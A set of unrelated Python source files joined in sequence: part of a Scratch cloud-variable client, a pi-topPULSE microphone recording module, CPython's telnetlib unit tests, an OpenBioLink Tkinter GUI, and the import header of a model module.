if 'cloud_update' in self.callback_directory.keys():
self.var_object = Variable(self.cloud_last_values[self.var_name], self.var_value,
self.var_name, self.username, self.project_id, self)
if self.receive_type == object:
threading.Thread(target=asyncio.run, args=(
self.callback_directory['cloud_update'](variable=self.var_object),)).start()
else:
pass
self.cloud_last_values[self.var_name] = self.var_value
elif self.compare_via == "time":
pass
self.responses.append(self.response)
time.sleep(0.25)
if 'tick' in self.callback_directory.keys():
threading.Thread(target=asyncio.run, args=(
self.callback_directory['tick'](),)).start()
if int(self.proxy_response) == 82:
if 'connected' in self.callback_directory.keys() and self.proxy_calls < 2:
threading.Thread(target=asyncio.run, args=(
self.callback_directory['connected'](),)).start()
else:
self.file = open(self.source, "r", encoding='UTF-8')
self.line = ""
self.count = 0
for i in self.file:
self.count += 1
if str(self.project_id) in i.lower():
self.line = i
break
self.message = f"{Fore.RED}[scratchon] Could Not Connect To Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Double check to make sure your this project has atleast 1 cloud variable and/or the project id is correct!\n {Fore.BLUE} Suggested Line:\n {Fore.WHITE} Line: {self.count} | {self.line} {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
except Exception as error:
print(error)
self.message = f"{Fore.RED}[scratchon] [502] Too Much Gateway Traffic for Project: ID: {self.project_id}\n{Fore.YELLOW} We have slowed down requests for 5 seconds to help.\n{Fore.RESET} Full Traceback: {error}"
print(self.message)
time.sleep(5)
self.main_loop = threading.Thread(target=call_scratch_api)
self.main_loop.start()
async def stop(self):
"""
Stops the connection to your scratch project.
:return: None
"""
self.websocket_connected = False
self.ws.close()
self.stats = await self.get_stats()
if self.counter < 1:
self.message = f"{Fore.GREEN}[scratchon] Closed Connection To: {self.stats.title}\n{Fore.RESET} You will no longer be able to use methods with this project, unless reconnected!"
print(self.message)
self.counter += 1
del self
def on(self, event):
"""
This decorator registers your function so it is called when an event happens within your Scratch project.
:param event: The type of event
:return: Wrapper
"""
def wrapper(function):
if str(event.lower()).startswith("?"):
self.callback_directory[event.lower()[1:]] = function
else:
if str(event.lower()) in self.event_dictionary:
self.callback_directory[event.lower()] = function
if event.lower() == 'cloud_update':
funonstring = str(inspect.signature(function))
funonstring = funonstring.replace('(', '')
funonstring = funonstring.replace(')', '')
funonstring = funonstring.replace(' ', '')
funonstring = funonstring.split(",")[0]
funonstring = funonstring.split(':')
self.receive_type = None
if len(funonstring) == 1:
self.receive_type = object
else:
if funonstring[1] == 'list':
self.receive_type = list
elif funonstring[1] == 'object':
self.receive_type = object
else:
self.message = f"{Fore.RED}[scratchon] return type can only be 'list' or 'object'\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
self.message = f"{Fore.RED}[scratchon] Invalid Event: event {str(event.lower())} not found\n{Fore.YELLOW} Tip: Make sure to check you spelled the event name correctly, else, add a ? to event name to make it a custom event\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
return wrapper
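# Hedged usage sketch for the event decorator (the handlers below are illustrative, not
# part of this module). 'cloud_update' handlers receive the changed Variable object:
#
#   @project.on('cloud_update')
#   async def on_cloud_update(variable: object):
#       print(variable.name, variable.last_value, '->', variable.current_value)
#
#   @project.on('connected')
#   async def on_connected():
#       print('connected to the project')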
async def get_stats(self):
"""
Gets the stats of your scratch project.
:return: Project instance
:rtype: object
"""
self.proxy_response = requests.get('https://api.scratch.mit.edu/projects/' + str(self.project_id)).json()
return Project(self.proxy_response)
async def set_variable(self, variable, value):
try:
self.ws.send(json.dumps({
'method': 'set',
'name': '☁ ' + variable,
'value': str(value),
'user': self.username,
'project_id': self.project_id
}) + '\n')
except BrokenPipeError:
print('Broken Pipe Error. Connection Lost.')
self.ws.connect('wss://clouddata.scratch.mit.edu', cookie='scratchsessionsid=' + self.session_id + ';',
origin='https://scratch.mit.edu', enable_multithread=True)
self.ws.send(json.dumps({
'method': 'handshake',
'user': self.username,
'project_id': str(self.project_id)
}) + '\n')
print('Re-connected to wss://clouddata.scratch.mit.edu')
print('Re-sending the data')
self.ws.send(json.dumps({
'method': 'set',
'name': '☁ ' + variable,
'value': str(value),
'user': self.username,
'project_id': self.project_id
}) + '\n')
async def get_variable(self, name: str, limit: str = "1000") -> str:
try:
resp = requests.get("https://clouddata.scratch.mit.edu/logs?projectid=" +
str(self.project_id) + "&limit=" + str(limit) + "&offset=0").json()
for i in resp:
x = i['name']
if x == ('☁ ' + str(name)):
return i['value']
except Exception:
raise Exception('Cloud variable could not be read.')
def encode(self, value):
if self.is_using_codec is None:
self.message = f"{Fore.RED}[scratchon] No codec_method has been set for Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Make sure to serve a file in scratchon.Client().manage()\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
return self.codec_method._encode(value)
def decode(self, value):
if self.is_using_codec is None:
self.message = f"{Fore.RED}[scratchon] No codec_method has been set for Project: ID: {self.project_id}\n{Fore.YELLOW} Tip: Make sure to serve a file in scratchon.Client().manage()\n{Fore.MAGENTA} Still Having Trouble? Join Our Discord Community: {self.discord_link} {Fore.RESET}"
print(self.message)
else:
return self.codec_method._decode(value)
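# Hedged usage sketch combining the codec with cloud variables (the variable name and
# text are placeholders, and the calls must run inside an async context). Assumes a
# codec file was passed as codec_method in Client.manage():
#
#   await project.set_variable('message', project.encode('hi'))
#   text = project.decode(await project.get_variable('message'))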
class Project:
def __init__(self, data):
for key in data:
setattr(self, key, data[key])
self.raw = data
def main(myself):
discord_link = "https://discord.gg/tF7j7MswUS"
if not isinstance(myself, Client):
print(f"{Fore.RED}[scratchon] Must run scratchon.main() on scratchon.Client()\n{Fore.YELLOW} Tip: Check to see if scratchon.Client() is a argument in scratchon.main()\n {Fore.MAGENTA}Still Having Trouble? Join Our Discord Community: {discord_link} {Fore.RESET}")
else:
while True:
pass
# In the works
class ExtensionManager:
def __init__(self):
self.extension_manual = None
self.check = None
self.version = 0.1
self.lol = None
self.later = "ate"
|
microphone.py
|
# microphone.py (pi-topPULSE)
# Copyright (C) 2017 CEED ltd.
#
import codecs
import binascii
import math
from tempfile import mkstemp
import os
import serial
import signal
import struct
import sys
from threading import Thread
import time
# local
from ptpulse import configuration
_debug = False
_bitrate = 8
_continue_writing = False
_recording_thread = False
_thread_running = False
_exiting = False
_temp_file_path = ""
#######################
# INTERNAL OPERATIONS #
#######################
def _debug_print(message):
"""INTERNAL. Print messages if debug mode enabled."""
if _debug == True:
print(message)
def _signal_handler(signal, frame):
"""INTERNAL. Handles signals from the OS."""
global _exiting
if _exiting == False:
_exiting = True
if _thread_running == True:
stop()
print("\nQuitting...")
sys.exit(0)
def _get_size(filename):
"""INTERNAL. Gets the size of a file."""
file_stats = os.stat(filename)
return file_stats.st_size
def _from_hex(value):
"""INTERNAL. Gets a bytearray from hex data."""
return bytearray.fromhex(value)
def _space_separated_little_endian(integer_value, byte_len):
"""INTERNAL. Get an integer in format for WAV file header."""
if byte_len <= 1:
pack_type = '<B'
elif byte_len <= 2:
pack_type = '<H'
elif byte_len <= 4:
pack_type = '<I'
elif byte_len <= 8:
pack_type = '<Q'
else:
print("Value cannot be represented in 8 bytes - exiting")
sys.exit()
hex_string = struct.pack(pack_type, integer_value)
temp = binascii.hexlify(hex_string).decode()
return ' '.join([temp[i:i+2] for i in range(0, len(temp), 2)])
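# Worked example (a sanity check, not part of the original module): packing 16000 as a
# 4-byte little-endian value yields the space-separated hex used in the WAV header:
#
#   _space_separated_little_endian(16000, 4)  # -> '80 3e 00 00'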
def _init_header_information():
"""INTERNAL. Create a WAV file header."""
RIFF = "52 49 46 46"
WAVE = "57 41 56 45"
fmt = "66 6d 74 20"
DATA = "64 61 74 61"
if configuration.microphone_sample_rate_is_22khz():
capture_sample_rate = 22050
else:
capture_sample_rate = 16000
header = _from_hex(RIFF) # ChunkID
header += _from_hex(_space_separated_little_endian(0, 4)) # ChunkSize - 4 bytes (to be changed depending on length of data...)
header += _from_hex(WAVE) # Format
header += _from_hex(fmt) # Subchunk1ID
header += _from_hex(_space_separated_little_endian(16, 4)) # Subchunk1Size (PCM = 16)
header += _from_hex(_space_separated_little_endian(1, 2)) # AudioFormat (PCM = 1)
header += _from_hex(_space_separated_little_endian(1, 2)) # NumChannels
header += _from_hex(_space_separated_little_endian(capture_sample_rate, 4)) # SampleRate
header += _from_hex(_space_separated_little_endian(capture_sample_rate, 4)) # ByteRate (Same as SampleRate due to 1 channel, 1 byte per sample)
header += _from_hex(_space_separated_little_endian(1, 2)) # BlockAlign - (no. of bytes per sample)
header += _from_hex(_space_separated_little_endian(_bitrate, 2)) # BitsPerSample
header += _from_hex(DATA) # Subchunk2ID
header += _from_hex(_space_separated_little_endian(0, 4)) # Subchunk2Size - 4 bytes (to be changed depending on length of data...)
return header
def _update_header_in_file(file, position, value):
"""INTERNAL. Update the WAV header """
hex_value = _space_separated_little_endian(value, 4)
data = binascii.unhexlify(''.join(hex_value.split()))
file.seek(position)
file.write(data)
def _finalise_wav_file(file_path):
"""INTERNAL. Update the WAV file header with the size of the data."""
size_of_data = _get_size(file_path) - 44
if size_of_data <= 0:
print("Error: No data was recorded!")
os.remove(file_path)
else:
with open(file_path, 'rb+') as file:
_debug_print("Updating header information...")
_update_header_in_file(file, 4, size_of_data + 36)
_update_header_in_file(file, 40, size_of_data)
def _thread_method():
"""INTERNAL. Thread method."""
_record_audio_to_file()
def _record_audio():
"""INTERNAL. Open the serial port and capture audio data. Function is a generator yielding data as it is read"""
if os.path.exists('/dev/serial0'):
_debug_print("Opening serial device...")
serial_device = serial.Serial(port = '/dev/serial0', timeout = 1, baudrate = 250000, parity = serial.PARITY_NONE, stopbits = serial.STOPBITS_ONE, bytesize = serial.EIGHTBITS)
serial_device_open = serial_device.isOpen()
if serial_device_open == True:
try:
_debug_print("Start recording")
if serial_device.inWaiting():
_debug_print("Flushing input and starting from scratch")
serial_device.flushInput()
_debug_print("WRITING: wave data")
while _continue_writing:
while not serial_device.inWaiting():
time.sleep(0.01)
audio_output = serial_device.read(serial_device.inWaiting())
if sys.version_info >= (3, 0):
bytes_to_write = bytearray()
else:
bytes_to_write = ""
for pcm_data_block in audio_output:
if _bitrate == 16:
pcm_data_int = 0
if sys.version_info >= (3, 0):
pcm_data_int = pcm_data_block
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += _from_hex(_space_separated_little_endian(scaled_val, 2))
else:
pcm_data_int = ord(pcm_data_block)
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += _from_hex(_space_separated_little_endian(scaled_val, 2))
else:
if sys.version_info >= (3, 0):
pcm_data_int = pcm_data_block
bytes_to_write += _from_hex(_space_separated_little_endian(pcm_data_int, 1))
else:
pcm_data_int = ord(pcm_data_block)
bytes_to_write += _from_hex(_space_separated_little_endian(pcm_data_int, 1))
yield bytes(bytes_to_write)
time.sleep(0.1)
finally:
serial_device.close()
_debug_print("Finished Recording.")
else:
print("Error: Serial port failed to open")
else:
print("Error: Could not find serial port - are you sure it's enabled?")
def _record_audio_to_file():
"""INTERNAL. Use the _record_audio generator to record audio to a temporary file"""
global _temp_file_path
temp_file_tuple = mkstemp()
os.close(temp_file_tuple[0])
_temp_file_path = temp_file_tuple[1]
try:
_debug_print("Start recording")
with open(_temp_file_path, 'wb') as file:
_debug_print("WRITING: initial header information")
file.write(_init_header_information())
_debug_print("WRITING: wave data")
for data in _record_audio():
file.write(data)
finally:
_finalise_wav_file(_temp_file_path)
_debug_print("Finished Recording.")
#######################
# EXTERNAL OPERATIONS #
#######################
def set_debug_print_state(debug_enable):
"""Enable/disable debug prints"""
global _debug
_debug = debug_enable
def record():
"""Start recording on the pi-topPULSE microphone to a file"""
global _thread_running
global _continue_writing
global _recording_thread
if not configuration.mcu_enabled():
print("Error: pi-topPULSE is not initialised.")
sys.exit()
if _thread_running == False and _continue_writing == False:
_thread_running = True
_continue_writing = True
_recording_thread = Thread(group=None, target=_thread_method)
_recording_thread.start()
else:
print("Microphone is already recording!")
def stream_audio():
"""Start recording on the pi-topPULSE microphone - returns a generator yielding audio data as it is read in."""
global _thread_running
global _continue_writing
if not configuration.mcu_enabled():
print("Error: pi-topPULSE is not initialised.")
sys.exit()
if _thread_running == False and _continue_writing == False:
_continue_writing = True
return _record_audio()
else:
print("Microphone is already recording!")
def is_recording():
"""Returns recording state of the pi-topPULSE microphone."""
return _thread_running
def stop():
"""Stops recording audio"""
global _thread_running
global _continue_writing
_continue_writing = False
if _thread_running:
_recording_thread.join()
_thread_running = False
def save(file_path, overwrite=False):
"""Saves recorded audio to a file."""
global _temp_file_path
if _thread_running == False:
if _temp_file_path != "" and os.path.exists(_temp_file_path):
if os.path.exists(file_path) == False or overwrite == True:
if os.path.exists(file_path):
os.remove(file_path)
os.rename(_temp_file_path, file_path)
_temp_file_path = ""
else:
print("File already exists")
else:
print("No recorded audio data found")
else:
print("Microphone is still recording!")
def set_sample_rate_to_16khz():
"""Set the appropriate I2C bits to enable 16,000Hz recording on the microphone"""
configuration.set_microphone_sample_rate_to_16khz()
def set_sample_rate_to_22khz():
"""Set the appropriate I2C bits to enable 22,050Hz recording on the microphone"""
configuration.set_microphone_sample_rate_to_22khz()
def set_bit_rate_to_unsigned_8():
"""Set bitrate to device default"""
global _bitrate
_bitrate = 8
def set_bit_rate_to_signed_16():
"""Set bitrate to double that of device default by scaling the signal"""
global _bitrate
_bitrate = 16
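# Hedged usage sketch (the output filename is a placeholder, not part of this module):
#
#   record()
#   time.sleep(5)   # capture roughly five seconds of audio
#   stop()
#   save("recording.wav", overwrite=True)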
#######################
# INITIALISATION #
#######################
_signal = signal.signal(signal.SIGINT, _signal_handler)
|
test_telnetlib.py
|
import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
from test.support import socket_helper
import unittest
HOST = socket_helper.HOST
def server(evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testContextManager(self):
with telnetlib.Telnet(HOST, self.port) as tn:
self.assertIsNotNone(tn.get_socket())
self.assertIsNone(tn.get_socket())
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testGetters(self):
# Test telnet getter methods
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
t_sock = telnet.sock
self.assertEqual(telnet.get_socket(), t_sock)
self.assertEqual(telnet.fileno(), t_sock.fileno())
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
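# Illustrative note (not part of the original test): recv() drains the queued reads up to
# `size` bytes and re-queues any surplus, e.g.
#   SocketStub([b'abc', b'def']).recv(4)  # -> b'abcd', with b'ef' pushed back onto reads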
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
class MockSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
@property
def resolution(self):
return 1e-3
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout=None):
block = False
for fileobj in self.keys:
if isinstance(fileobj, TelnetAlike):
block = fileobj.sock.block
break
if block:
return []
else:
return [(key, key.events) for key in self.keys.values()]
def get_map(self):
return self.keys
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ExpectAndReadTestCase(unittest.TestCase):
def setUp(self):
self.old_selector = telnetlib._TelnetSelector
telnetlib._TelnetSelector = MockSelector
def tearDown(self):
telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_until
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same guarantees
# (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def test_read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(unittest.TestCase):
'''The only thing that write does is replace each tl.IAC with
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
gui.py
|
import os
import sys
import threading
import tkinter as tk
from tkinter import font as tkfont, messagebox
from tkinter.ttk import Style
from openbiolink import openBioLink
from openbiolink.gui.confirmFrame import ConfirmFrame
from openbiolink.gui.console import ConsoleFrame
from openbiolink.gui.graphCreationFrame import GraphCreationFrame
from openbiolink.gui.splitFrame import SplitFrame
from openbiolink.gui.startPage import StartPage
app = None
class BimegGui(tk.Tk):
ARGS_LIST_GLOBAL = []
ARGS_LIST_GRAPH_CREATION = []
ARGS_LIST_TRAIN_TEST_SPLIT = []
ARGS_LIST_EVAL = []
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
# Define Fonts
self.title_font = tkfont.Font(family="Helvetica", size=18, weight="bold", slant="italic")
self.info_font = tkfont.Font(family="Helvetica", size=7, slant="italic")
# Define base container
self.container = tk.Frame(self)
# self.wm_geometry('600x470')
self.container.pack(side="top", fill="both", expand=True)
self.container.grid_rowconfigure(0, weight=1)
self.container.grid_columnconfigure(0, weight=1)
# Initialize all frames
self.frames = {}
for F in (StartPage, GraphCreationFrame, SplitFrame, ConfirmFrame, ConsoleFrame):
page_name = F.__name__
frame = F(parent=self.container, controller=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.args = []
self.selected_frames = ["ConfirmFrame"]
self.next_frame_index = 0
self.show_frame("StartPage")
def set_selected_frames(self, selected_frames):
self.selected_frames = selected_frames + self.selected_frames
def show_next_frame(self):
if self.next_frame_index == len(self.selected_frames):
self.start()
else:
self.show_frame(self.selected_frames[self.next_frame_index])
self.next_frame_index += 1
def show_previous_frame(self):
if self.next_frame_index == 1:
self.next_frame_index = 0
self.show_frame("StartPage")
self.selected_frames = ["ConfirmFrame"]
else:
self.next_frame_index -= 1
self.show_frame(self.selected_frames[self.next_frame_index - 1])
def show_frame(self, page_name):
""" Show a frame for the given page name """
frame = self.frames[page_name]
frame.controller = self
frame.update()
frame.tkraise()
def start(self):
""" start script and close gui"""
if messagebox.askokcancel("Start", "Do you want to start now?"):
self.show_frame("ConsoleFrame")
def _main(*args_lists):
for arg_list in args_lists:
openBioLink.main(arg_list)
args = [
list(self.ARGS_LIST_GLOBAL) + list(args)
for args in (self.ARGS_LIST_GRAPH_CREATION, self.ARGS_LIST_TRAIN_TEST_SPLIT, self.ARGS_LIST_EVAL)
if args
]
thread = threading.Thread(target=_main, args=args, daemon=True)
thread.start()
# fixme start detached
# app.destroy()
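# Illustrative sketch (not part of the GUI): start() above builds one argument list per selected
# pipeline stage by prepending the shared global arguments and skipping stages whose own argument
# list is empty, before handing them to openBioLink.main in a worker thread. The standalone helper
# below (hypothetical name and sample values) mirrors that assembly pattern with plain lists.
def _assemble_stage_args(global_args, *stage_args_lists):
    return [list(global_args) + list(stage) for stage in stage_args_lists if stage]
# _assemble_stage_args(["--dir", "out"], ["generate"], [], ["evaluate"])
# -> [["--dir", "out", "generate"], ["--dir", "out", "evaluate"]]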
#################### ASK FOR EXIT ############################
class AskForExitPopup:
def __init__(self, message):
self.exit = False
win = self.win = tk.Toplevel()
l = tk.Label(self.win, text=message)
l.grid(row=0, column=0)
b1 = tk.Button(win, text="Cancel", command=self.cancel)
b2 = tk.Button(win, text="Continue", command=self.go_on)
b1.grid(row=1, column=0)
b2.grid(row=1, column=1)
win.wait_window()
def cancel(self):
self.win.destroy()
self.exit = True
def go_on(self):
self.win.destroy()
self.exit = False
def askForExit(message):
popup = AskForExitPopup(message)
if popup.exit:
on_closing()
#################### SKIP EXISTING FILES ############################
class SkipExistingFilesPopup:
def __init__(self, file_path):
self.skip = None
self.for_all = False
self.win = tk.Toplevel()
message = "The file %s already exists" % (file_path)
l = tk.Label(self.win, text=message)
button_panel = tk.Frame(self.win)
go_on_button = tk.Button(button_panel, text="continue anyways", command=self.go_on)
go_on_all_button = tk.Button(button_panel, text="continue anyways for all files", command=self.go_on_for_all)
skip_button = tk.Button(button_panel, text="skip this file", command=self.skip_this)
skip_all_button = tk.Button(button_panel, text="skip all existing files", command=self.skip_all)
exit_button = tk.Button(button_panel, text="exit", command=self.exit)
l.pack(side="top")
button_panel.pack(side="top")
go_on_button.pack(side="left")
go_on_all_button.pack(side="left")
skip_button.pack(side="left")
skip_all_button.pack(side="left")
exit_button.pack(side="left")
self.win.wait_window()
def exit(self):
self.win.destroy()
self.skip = None
self.for_all = None
def go_on(self):
self.win.destroy()
self.skip = None
self.for_all = False
def go_on_for_all(self):
self.win.destroy()
self.skip = False
self.for_all = True
def skip_this(self):
self.win.destroy()
self.skip = True
self.for_all = False
def skip_all(self):
self.win.destroy()
self.skip = True
self.for_all = True
def skipExistingFiles(file_path):
skip = None
for_all = False
if os.path.isfile(file_path):
popup_response = SkipExistingFilesPopup(file_path)
skip = popup_response.skip
for_all = popup_response.for_all
if skip is None and for_all is None:
on_closing()
return skip, for_all
#################### MAIN GUI ############################
def on_closing():
if messagebox.askokcancel("Quit", "Do you really want to quit?"):
app.destroy()
sys.exit()
def show_info_box(msg):
if not bool(msg):
msg = "No info available"
messagebox.showinfo("Info", msg)
def start_gui():
global app
app = BimegGui()
app.style = Style()
app.protocol("WM_DELETE_WINDOW", on_closing)
app.mainloop()
|
model.py
|
import glob
import json
import copy
import importlib
import threading
import logging
import pytz
#for tables
import numpy
import numpy as np
import datetime
import dateutil.parser
import sys
import os
import time
import uuid
import hashlib
import random
import traceback
from dates import *
# type hints
from typing import List
import modeltemplates
# for Observer
from queue import Queue
from queue import Empty
import utils
from timeseries import TimeSeriesTable
from dates import *
import inspect
from utils import str_lim
"""
next Todo
-
- execute: problem in the thread with the execution
- code documentation
- google document
-
"""
sys.path.append("./plugins") #for the importlib loader, doesn't understand relative paths
#sys.path.append("./private") #for the importlib loader, doesn't understand relative paths
